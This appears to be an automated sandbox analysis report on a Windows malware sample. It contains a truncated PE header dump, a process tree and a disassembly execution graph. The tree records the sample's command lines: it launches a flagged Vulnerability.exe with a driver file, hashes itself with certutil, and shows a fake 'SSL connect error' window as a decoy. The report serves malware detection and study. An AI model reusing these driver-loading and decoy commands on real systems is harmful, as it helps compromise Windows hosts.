                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 d4 f7 12 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 63 5e 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AU U U U T XV U N XS XP :T :T RichU PEdg"&@c^`A`(P*#p$`28 1@0.text h.rdataP0@H.data@ @.pdataP"@HINIT`$ b.reloc$p(@B


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:02:10:09
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Users\user\Desktop\lUAc7lqa56.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\lUAc7lqa56.exe"
                                                                                        Imagebase:0x7ff78ffa0000
                                                                                        File size:6'062'592 bytes
                                                                                        MD5 hash:4C428E14CF5FC2C5E54BA377389C8253
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:02:10:09
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c cd C:\
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\Vulnerability.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
                                                                                        Imagebase:0x7ff7cc410000
                                                                                        File size:145'408 bytes
                                                                                        MD5 hash:8619AFEC8BD66B2C589FC987D7D0B194
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 55%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\certutil.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
                                                                                        Imagebase:0x7ff73ee30000
                                                                                        File size:1'651'712 bytes
                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\find.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:find /i /v "md5"
                                                                                        Imagebase:0x7ff6169c0000
                                                                                        File size:17'920 bytes
                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\find.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:find /i /v "certutil"
                                                                                        Imagebase:0x7ff6169c0000
                                                                                        File size:17'920 bytes
                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
                                                                                        Imagebase:0x7ff6ca8e0000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:timeout /t 5
                                                                                        Imagebase:0x7ff679060000
                                                                                        File size:32'768 bytes
                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:02:10:25
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288
                                                                                        Imagebase:0x7ff6ca8e0000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:13.1%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:36.8%
                                                                                          Total number of Nodes:1771
                                                                                          Total number of Limit Nodes:28
                                                                                          execution_graph 7572 7ff7cc423fe8 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 7444 7ff7cc425170 7445 7ff7cc425190 7444->7445 7446 7ff7cc425183 7444->7446 7448 7ff7cc419a50 7446->7448 7449 7ff7cc419a8f 7448->7449 7450 7ff7cc419a63 7448->7450 7449->7445 7451 7ff7cc419aa8 _invalid_parameter_noinfo_noreturn 7450->7451 7452 7ff7cc419a87 7450->7452 7453 7ff7cc423fe0 free 7452->7453 7453->7449 7454 7ff7cc420f70 7455 7ff7cc420f91 7454->7455 7460 7ff7cc420fc2 7454->7460 7458 7ff7cc4210ad _invalid_parameter_noinfo_noreturn 7455->7458 7459 7ff7cc423fe0 free 7455->7459 7456 7ff7cc421017 7457 7ff7cc421063 __std_exception_destroy 7456->7457 7456->7458 7464 7ff7cc42105b 7456->7464 7462 7ff7cc42109a 7457->7462 7463 7ff7cc42108d 7457->7463 7467 7ff7cc4210da 7458->7467 7470 7ff7cc42110b 7458->7470 7459->7460 7460->7456 7460->7458 7461 7ff7cc423fe0 free 7460->7461 7461->7456 7466 7ff7cc423fe0 free 7463->7466 7465 7ff7cc423fe0 free 7464->7465 7465->7457 7466->7462 7468 7ff7cc4211db _invalid_parameter_noinfo_noreturn __std_exception_copy 7467->7468 7469 7ff7cc423fe0 free 7467->7469 7475 7ff7cc42124c 7468->7475 7469->7470 7470->7468 7471 7ff7cc421160 7470->7471 7473 7ff7cc423fe0 free 7470->7473 7471->7468 7472 7ff7cc4211ac __std_exception_destroy 7471->7472 7474 7ff7cc423fe0 free 7471->7474 7472->7468 7473->7471 7474->7472 7476 7ff7cc419af0 22 API calls 7475->7476 7477 7ff7cc421268 7476->7477 7661 7ff7cc41f070 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 7727 7ff7cc4110f0 __std_exception_destroy 7728 7ff7cc411118 7727->7728 7729 7ff7cc411125 7727->7729 7730 7ff7cc423fe0 free 7728->7730 7730->7729 7481 7ff7cc41d760 7482 7ff7cc41d8c9 7481->7482 7483 7ff7cc41d790 7481->7483 7501 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 7482->7501 7485 7ff7cc41d7eb 7483->7485 7487 7ff7cc41d817 7483->7487 7488 7ff7cc41d7de 7483->7488 7489 7ff7cc424108 std::_Facet_Register 3 API calls 7485->7489 7486 7ff7cc41d8ce 7491 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 7486->7491 7490 7ff7cc41d800 7487->7490 7493 7ff7cc424108 std::_Facet_Register 3 API calls 7487->7493 7488->7485 7488->7486 7489->7490 7492 7ff7cc41d88e _invalid_parameter_noinfo_noreturn 7490->7492 7495 7ff7cc41d848 memmove memmove 7490->7495 7496 7ff7cc41d895 memmove memmove 7490->7496 7494 7ff7cc41d8d4 7491->7494 7492->7496 7493->7490 7497 7ff7cc41d86c 7495->7497 7498 7ff7cc41d881 7495->7498 7500 7ff7cc41d88c 7496->7500 7497->7492 7497->7498 7499 7ff7cc423fe0 free 7498->7499 7499->7500 7574 7ff7cc41a5e0 7575 7ff7cc41a629 7574->7575 7576 7ff7cc41a630 ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA_N_N 7574->7576 7575->7576 7577 7ff7cc41a647 ?getloc@ios_base@std@@QEBA?AVlocale@2 7576->7577 7578 7ff7cc41a6da ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 7576->7578 7587 7ff7cc41a2b0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 7577->7587 7581 7ff7cc41a79b 7578->7581 7584 7ff7cc41a6d0 7584->7578 7585 7ff7cc41cc00 8 API calls 7584->7585 7586 7ff7cc41a728 ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7584->7586 7585->7586 7586->7584 7588 7ff7cc41a312 7587->7588 7589 7ff7cc41a387 ??1_Lockit@std@@QEAA 7588->7589 7591 7ff7cc41a329 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 7588->7591 7592 7ff7cc41a335 7588->7592 7590 7ff7cc423fc0 8 API calls 7589->7590 7593 7ff7cc41a3a2 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7590->7593 7591->7592 7592->7589 7594 7ff7cc41a34c ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 7592->7594 7593->7584 7595 7ff7cc41a3b7 7594->7595 7596 7ff7cc41a360 7594->7596 7598 7ff7cc411280 Concurrency::cancel_current_task 2 API calls 7595->7598 7597 7ff7cc423868 std::_Facet_Register 3 API calls 7596->7597 7599 7ff7cc41a372 7597->7599 7600 7ff7cc41a3bc 7598->7600 7599->7589 7601 7ff7cc4207e0 7602 7ff7cc420811 ?_Winerror_map@std@@YAHH 7601->7602 7603 7ff7cc4207f5 7601->7603 7604 7ff7cc42081d 7602->7604 7738 7ff7cc4196e0 7739 7ff7cc4196ec _unlock_file 7738->7739 7740 7ff7cc4196f3 7738->7740 7739->7740 7741 7ff7cc4190e0 7742 7ff7cc419117 7741->7742 7743 7ff7cc419127 7742->7743 7745 7ff7cc4191ae fgetc 7742->7745 7746 7ff7cc419192 fgetc 7742->7746 7744 7ff7cc423fc0 8 API calls 7743->7744 7747 7ff7cc41939b 7744->7747 7749 7ff7cc4192e9 7745->7749 7752 7ff7cc4191db 7745->7752 7746->7743 7748 7ff7cc419388 7754 7ff7cc423fe0 free 7748->7754 7749->7743 7749->7748 7753 7ff7cc419324 _invalid_parameter_noinfo_noreturn 7749->7753 7750 7ff7cc41921a ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 7750->7752 7751 7ff7cc41cc00 8 API calls 7751->7750 7752->7749 7752->7750 7752->7751 7755 7ff7cc419290 memmove fgetc 7752->7755 7756 7ff7cc419343 7752->7756 7753->7749 7754->7743 7755->7749 7755->7752 7756->7749 7757 7ff7cc419360 ungetc 7756->7757 7757->7749 7757->7756 7758 7ff7cc419ce0 7759 7ff7cc411e20 15 API calls 7758->7759 7760 7ff7cc419cfb 7759->7760 7761 7ff7cc419d0d 7760->7761 7762 7ff7cc423fe0 free 7760->7762 7762->7761 7605 7ff7cc425be4 _seh_filter_exe 7663 7ff7cc424866 7664 7ff7cc424cac GetModuleHandleW 7663->7664 7665 7ff7cc42486d 7664->7665 7666 7ff7cc4248ac _exit 7665->7666 7667 7ff7cc424871 7665->7667 7668 7ff7cc425287 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA 7763 7ff7cc42530a ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA 7610 7ff7cc42520c 7611 7ff7cc42522c 7610->7611 7612 7ff7cc42521f 7610->7612 7613 7ff7cc419a50 2 API calls 7612->7613 7613->7611 7764 7ff7cc42590c 7765 7ff7cc41f0b0 20 API calls 7764->7765 7766 7ff7cc425926 7765->7766 7773 7ff7cc41ec50 7766->7773 7774 7ff7cc41ec64 _invalid_parameter_noinfo_noreturn 7773->7774 7308 7ff7cc418f90 7309 7ff7cc418fa7 7308->7309 7310 7ff7cc418fb2 7308->7310 7311 7ff7cc418fc8 7310->7311 7312 7ff7cc418fb9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 7310->7312 7313 7ff7cc418fed memmove 7311->7313 7316 7ff7cc419022 7311->7316 7312->7311 7313->7316 7314 7ff7cc4190be 7315 7ff7cc41909e 7315->7314 7318 7ff7cc4190a3 fread 7315->7318 7316->7314 7316->7315 7317 7ff7cc419070 fread 7316->7317 7317->7314 7317->7316 7318->7314 7669 7ff7cc425690 ??1_Lockit@std@@QEAA 7776 7ff7cc420710 7777 7ff7cc420728 7776->7777 7778 7ff7cc42071e 7776->7778 7779 7ff7cc423fe0 free 7778->7779 7779->7777 7670 7ff7cc411090 __std_exception_copy 7510 7ff7cc418b80 7511 7ff7cc418bc0 7510->7511 7512 7ff7cc418b93 7510->7512 7512->7511 7513 7ff7cc418ba3 fflush 7512->7513 7671 7ff7cc425a80 7672 7ff7cc425a9a 7671->7672 7673 7ff7cc425a93 CloseHandle 7671->7673 7673->7672 7780 7ff7cc419700 7781 7ff7cc41970c _lock_file 7780->7781 7782 7ff7cc419713 7780->7782 7781->7782 7319 7ff7cc418db0 7322 7ff7cc418de3 7319->7322 7320 7ff7cc419e00 10 API calls 7323 7ff7cc418e06 7320->7323 7321 7ff7cc418e41 7324 7ff7cc423fc0 8 API calls 7321->7324 7322->7320 7322->7321 7323->7321 7326 7ff7cc418e14 _fseeki64 7323->7326 7327 7ff7cc418e2b fgetpos 7323->7327 7325 7ff7cc418eab 7324->7325 7326->7321 7326->7327 7327->7321 7514 7ff7cc41a530 7515 7ff7cc41a53e ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 7514->7515 7516 7ff7cc41a568 7515->7516 7517 7ff7cc41a55e ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 7515->7517 7517->7516 7623 7ff7cc4189b0 7624 7ff7cc4189bc 7623->7624 7625 7ff7cc423fe0 free 7623->7625 7677 7ff7cc419430 7678 7ff7cc41944b 7677->7678 7679 7ff7cc419461 7678->7679 7680 7ff7cc41949b ungetc 7678->7680 7680->7679 7783 7ff7cc4248b4 7786 7ff7cc424d6c 7783->7786 7787 7ff7cc424d8f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7786->7787 7788 7ff7cc4248bd 7786->7788 7787->7788 7519 7ff7cc42471c 7523 7ff7cc424d00 SetUnhandledExceptionFilter 7519->7523 7328 7ff7cc41a5a0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 7524 7ff7cc419520 7525 7ff7cc419546 7524->7525 7528 7ff7cc41954d 7524->7528 7526 7ff7cc423fc0 8 API calls 7525->7526 7527 7ff7cc4196c6 7526->7527 7528->7525 7529 7ff7cc4195d3 fputc 7528->7529 7530 7ff7cc4195f5 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 7528->7530 7529->7525 7531 7ff7cc41963a 7530->7531 7532 7ff7cc419664 7530->7532 7531->7532 7533 7ff7cc41963f 7531->7533 7532->7525 7534 7ff7cc419673 fwrite 7532->7534 7533->7525 7535 7ff7cc419644 fputc 7533->7535 7534->7525 7535->7525 7536 7ff7cc419720 7537 7ff7cc41973d 7536->7537 7538 7ff7cc41977a ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 7537->7538 7539 7ff7cc419ef0 12 API calls 7537->7539 7539->7538 7336 7ff7cc411b20 memset 7378 7ff7cc419790 7336->7378 7339 7ff7cc411c37 7341 7ff7cc411c3c ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J ??Bios_base@std@ 7339->7341 7340 7ff7cc411bc5 7344 7ff7cc411c0a 7340->7344 7345 7ff7cc411be1 7340->7345 7360 7ff7cc411e13 7340->7360 7342 7ff7cc411c6b 7341->7342 7343 7ff7cc411d2c 7341->7343 7385 7ff7cc411a70 7342->7385 7347 7ff7cc41c9f0 7 API calls 7343->7347 7351 7ff7cc424108 std::_Facet_Register 3 API calls 7344->7351 7349 7ff7cc411e0e 7345->7349 7354 7ff7cc424108 std::_Facet_Register 3 API calls 7345->7354 7357 7ff7cc411d4d 7347->7357 7353 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 7349->7353 7352 7ff7cc411bf3 7351->7352 7355 7ff7cc411c15 memset 7352->7355 7364 7ff7cc411d77 _invalid_parameter_noinfo_noreturn 7352->7364 7353->7360 7354->7352 7355->7341 7356 7ff7cc411d89 7363 7ff7cc411e20 15 API calls 7356->7363 7357->7356 7361 7ff7cc411d7e 7357->7361 7357->7364 7358 7ff7cc411cdc 7365 7ff7cc411e20 15 API calls 7358->7365 7393 7ff7cc41d3b0 ?_Xlength_error@std@@YAXPEBD 7360->7393 7367 7ff7cc423fe0 free 7361->7367 7362 7ff7cc411cd1 7368 7ff7cc423fe0 free 7362->7368 7369 7ff7cc411d97 7363->7369 7364->7361 7370 7ff7cc411cea 7365->7370 7366 7ff7cc411cca _invalid_parameter_noinfo_noreturn 7366->7362 7367->7356 7368->7358 7371 7ff7cc411dce 7369->7371 7372 7ff7cc411dc6 7369->7372 7374 7ff7cc411e07 _invalid_parameter_noinfo_noreturn 7369->7374 7370->7371 7370->7372 7375 7ff7cc411d25 _invalid_parameter_noinfo_noreturn 7370->7375 7373 7ff7cc423fc0 8 API calls 7371->7373 7376 7ff7cc423fe0 free 7372->7376 7377 7ff7cc411df0 7373->7377 7374->7349 7375->7343 7376->7371 7379 7ff7cc4197b8 7378->7379 7380 7ff7cc4197bb ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7378->7380 7379->7380 7394 7ff7cc41a170 7380->7394 7383 7ff7cc411b81 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2 ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH 7383->7339 7383->7340 7384 7ff7cc419872 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 7384->7383 7403 7ff7cc411330 7385->7403 7388 7ff7cc411ac8 7390 7ff7cc411b06 7388->7390 7411 7ff7cc411030 7388->7411 7414 7ff7cc419930 7388->7414 7391 7ff7cc423fc0 8 API calls 7390->7391 7392 7ff7cc411b16 7391->7392 7392->7358 7392->7362 7392->7366 7395 7ff7cc41a19e ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH 7394->7395 7396 7ff7cc41a25a 7394->7396 7395->7396 7397 7ff7cc41a1bc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 7395->7397 7398 7ff7cc423fc0 8 API calls 7396->7398 7399 7ff7cc41c7a0 18 API calls 7397->7399 7400 7ff7cc41986d 7398->7400 7401 7ff7cc41a24a ?always_noconv@codecvt_base@std@ 7399->7401 7400->7383 7400->7384 7401->7396 7402 7ff7cc41a260 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7401->7402 7402->7396 7404 7ff7cc411387 7403->7404 7405 7ff7cc41139d malloc 7403->7405 7404->7405 7406 7ff7cc411a57 7405->7406 7407 7ff7cc4113c3 memmove 7405->7407 7406->7388 7408 7ff7cc4113ed memset 7407->7408 7410 7ff7cc411404 free 7407->7410 7408->7410 7410->7406 7421 7ff7cc411020 7411->7421 7413 7ff7cc411055 __stdio_common_vsprintf 7413->7388 7415 7ff7cc419944 7414->7415 7415->7415 7416 7ff7cc419960 memmove 7415->7416 7417 7ff7cc41999f 7415->7417 7416->7388 7418 7ff7cc41cea0 10 API calls 7417->7418 7420 7ff7cc4199b2 7418->7420 7420->7388 7421->7413 7540 7ff7cc413f20 7541 7ff7cc413f2f SymUnloadModule64 SymCleanup CloseHandle CloseHandle 7540->7541 7544 7ff7cc413f5c 7540->7544 7541->7544 7542 7ff7cc413f93 7543 7ff7cc413fdd 7542->7543 7545 7ff7cc413ff6 _invalid_parameter_noinfo_noreturn 7542->7545 7547 7ff7cc413fd5 7542->7547 7544->7542 7544->7545 7546 7ff7cc423fe0 free 7544->7546 7546->7542 7548 7ff7cc423fe0 free 7547->7548 7548->7543 7789 7ff7cc4256c8 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 7553 7ff7cc41a747 7554 7ff7cc41a75b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 7553->7554 7556 7ff7cc41a79b 7554->7556 7557 7ff7cc420750 7564 7ff7cc4238a8 GetLocaleInfoEx 7557->7564 7560 7ff7cc41c9f0 7 API calls 7561 7ff7cc4207ba LocalFree 7560->7561 7562 7ff7cc423fc0 8 API calls 7561->7562 7563 7ff7cc4207d5 7562->7563 7565 7ff7cc4238d8 FormatMessageA 7564->7565 7567 7ff7cc420785 7565->7567 7567->7560 7568 7ff7cc419d50 ?uncaught_exception@std@ 7569 7ff7cc419d6d 7568->7569 7570 7ff7cc419d63 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 7568->7570 7570->7569 7800 7ff7cc418cd0 7801 7ff7cc418d06 7800->7801 7807 7ff7cc418d25 7800->7807 7802 7ff7cc419e00 10 API calls 7801->7802 7804 7ff7cc418d0b 7802->7804 7803 7ff7cc423fc0 8 API calls 7805 7ff7cc418d9b 7803->7805 7806 7ff7cc418d0f fsetpos 7804->7806 7804->7807 7806->7807 7807->7803 7632 7ff7cc418bd0 7633 7ff7cc418bf3 7632->7633 7634 7ff7cc418c8d 7633->7634 7635 7ff7cc418c0f setvbuf 7633->7635 7638 7ff7cc423fc0 8 API calls 7634->7638 7635->7634 7636 7ff7cc418c1d ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7635->7636 7636->7634 7637 7ff7cc418c3f _get_stream_buffer_pointers 7636->7637 7637->7634 7639 7ff7cc418cbc 7638->7639 7682 7ff7cc41d050 7683 